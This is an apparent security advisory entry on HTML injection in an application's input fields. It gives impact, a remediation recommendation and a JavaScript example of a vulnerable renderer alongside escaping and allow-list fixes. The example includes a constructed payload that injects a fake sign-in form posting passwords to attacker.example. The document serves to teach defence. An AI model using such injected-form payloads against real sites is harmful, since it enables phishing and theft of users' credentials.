Description

The application's input fields allow the injection of HTML code: text submitted by a user is rendered into the page without validation or encoding. An attacker can use this to alter the application's appearance (for example by inserting a fake form or link) in order to trick its users into performing undesired actions.

Impact

- Allow an attacker to modify the content and appearance of the page.
- Craft malicious links that carry the injected HTML content and send them to users via email, so that the forged content is shown under the application's own domain.

Recommendation

Validate the information that comes from text fields against an allow list (or a restrictive regular expression) and reject anything that does not match, and encode the value for HTML before rendering it, so that the characters `<`, `>`, `&`, `"` and `'` cannot change the structure of the page.
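The following is an added example, not code from the original advisory or from any affected product. It shows the injection described above on a hypothetical "display name" field rendered by string concatenation, a constructed payload that replaces the greeting with a fake sign-in form, and the remediation from the recommendation: an allow-list check for fields with a known shape, plus HTML encoding on output for free text. Function names, the regular expression and the payload are all assumptions made for the illustration.

```javascript
// Added example (not from the original page). All names are illustrative.

// Vulnerable: user-controlled text is concatenated straight into the markup,
// so any tags it contains become part of the page.
function renderGreetingVulnerable(displayName) {
  return `<p>Welcome back, ${displayName}!</p>`;
}

// Encode the five characters that can change HTML structure or break out of
// an attribute value. Encoding is applied on output, never stored.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Allow list for a field with a known shape (hypothetical policy): letters,
// digits, spaces and a few punctuation marks, 1..40 characters. Anything else
// is rejected rather than "cleaned", so there is no filter to bypass.
const DISPLAY_NAME_RE = /^[\p{L}\p{N} .'-]{1,40}$/u;

function isValidDisplayName(displayName) {
  return typeof displayName === "string" && DISPLAY_NAME_RE.test(displayName);
}

// Hardened: validate against the allow list, then encode on output. Encoding
// is still applied because the allow list permits an apostrophe.
function renderGreetingSafe(displayName) {
  if (!isValidDisplayName(displayName)) {
    throw new Error("invalid display name");
  }
  return `<p>Welcome back, ${escapeHtml(displayName)}!</p>`;
}

// Free-text fields (comments, descriptions) usually cannot be allow-listed
// as tightly; there, output encoding alone neutralises injected markup.
function renderCommentSafe(comment) {
  return `<div class="comment">${escapeHtml(comment)}</div>`;
}

// Constructed payload: closes the greeting paragraph and inserts a fake
// "session expired" form that would post the password to an attacker host.
const PAYLOAD =
  '</p><form action="https://attacker.example/collect" method="post">' +
  "<p>Your session has expired, please sign in again.</p>" +
  '<input name="password" type="password"><button>Sign in</button></form><p>';

// Check used by the tests: does the rendered HTML contain an element that the
// template itself never emits?
function containsInjectedMarkup(html) {
  return /<(form|script|iframe|a|img|input)\b/i.test(html);
}

// Stand-alone run: show the unsafe rendering next to the hardened ones.
function demo() {
  const results = {
    vulnerable: renderGreetingVulnerable(PAYLOAD),
    safeName: renderGreetingSafe("O'Brien"),
    safeComment: renderCommentSafe(PAYLOAD),
    payloadRejected: !isValidDisplayName(PAYLOAD),
  };
  console.log(results);
  return results;
}

if (typeof require !== "undefined" && require.main === module) {
  demo();
}
```

The allow-list check is the right tool only when the field has a fixed shape; for free text, encoding on output is the control that actually removes the injection, and it must be applied at every place the value is rendered, not once on the way into the database.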

Threat

Authenticated attacker from the Internet.

Expected Remediation Time

⏱️ 60 minutes.

Fixes